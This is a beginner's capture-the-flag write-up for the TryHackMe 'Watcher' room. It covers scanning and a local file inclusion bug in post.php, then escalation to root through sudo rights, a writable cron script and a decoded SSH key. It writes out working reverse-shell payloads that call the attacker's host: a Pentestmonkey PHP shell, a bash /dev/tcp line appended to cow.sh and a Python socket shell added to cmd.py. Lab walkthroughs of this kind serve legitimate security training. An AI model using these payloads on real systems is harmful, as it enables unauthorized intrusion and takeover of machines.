Watcher — Try Hack Me
Hi folks, I am going to share writeup of a very good and common privilege escalation in tryhackme, named Watcher. This is recommended for beginners who are trying to learn privilege escalation.
Initial Rust Scan
rustscan -a <ip> — A -sC -sV
Found 3 open port
On browsing the ip followed by http port 80, we get a site though nothing useful
Directory Bruteforce
gobuster dir -u http://<ip>:80 -w <path to wordlist> -x php,php3,html,txtI am running gobuster scan with wordlist
SecLists/Discovery/Web-Content/directory-list-2.3-small.txt
specifying type of extension to search with -x.
Got robots.txt
On browsing to http://<ip>:80/robots.txt we get path to flag_1.txt
Local File Inclusion Vulnerability
Reading the manual provided through link helps alot
http://<ip>/post.php?post=secret_file_do_not_read.txt
It gives the user and password for ftp on port 21
ftp <ip> 21Here, ‘files’ directory let us to put file. Let us upload reverse shell file here.I will be using famous Pentestmonkey script. We need to modify the ip in script with our tryhackme IP. I have changed the port to 4444 too. We will move to files directory.
cd filesput shell.php
File to be uploaded should be in same location where terminal is open.
We will keep a listener on our machine to listen the reverse shell using netcat.
nc -nvlp 4444Now, we have to execute the file we have uploaded so lets browse the location
http://<ip>/post.php?post=../../../../../../../home/ftpuser/ftp/files/shell.phpWe get a reverse shell, lets stabilize it
python3 -c ‘import pty;pty.spawn(“/bin/bash”)’Lets find the location of all flag available
find / -type f -name flag_*.txt 2> /dev/nullFound
We can access the flag2 and flag3. Lets escalate to 4th flag.
Lets check the permissions we have
sudo -l
It shows that user toby cab be bashed.Lets bash it so we can have access to ‘toby’ files.
sudo -u toby /bin/bashLets check the crontab file in toby user
This job is running as “mat” and we can edit /home/toby/jobs/cow.sh to get a reverse shell as user “mat”. Add the following line in cow.sh with the ip of our own attacking machine:
echo ‘/bin/bash -i >& /dev/tcp/10.0.0.1/9999 0>&1’ >> cow.shHere 10.0.0.1 is ip of tryhackme and 9999 is port for listening.
Listening on port 9999
nc -nvlp 9999As soon as we execute any command on the terminal of toby we get reverse shell as user ‘mat’.
Again checking for permissions we have
sudo -l 
Here, user will can be accessed with little configurations.We can edit the cmd.py file to give us a shell! Let’s run the following:
echo 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/bash","-i"]);' >> cmd.pyListening on port 1234
nc -nvlp 1234Executing the will_script.py
sudo -u will /usr/bin/python3 /home/mat/scripts/will_script.py 1We get reverse shell with user ‘will’
Getting Root
Finding permissions for root
find / -group adm 2>/dev/null
Here, we can see file name key.b64.Lets view that
cat /opt/backups/key.b64
Decrypting the key
cat /opt/backups/key.b64 | base64 -d
We get ssh key now lets login with ssh using this key
Changing the permission of file with key as content
chmod 400 keyNow, ssh with this key
ssh -i key root@<iP>We are login as root. We can view the flag_7.txt
Thanks for reading so far!!
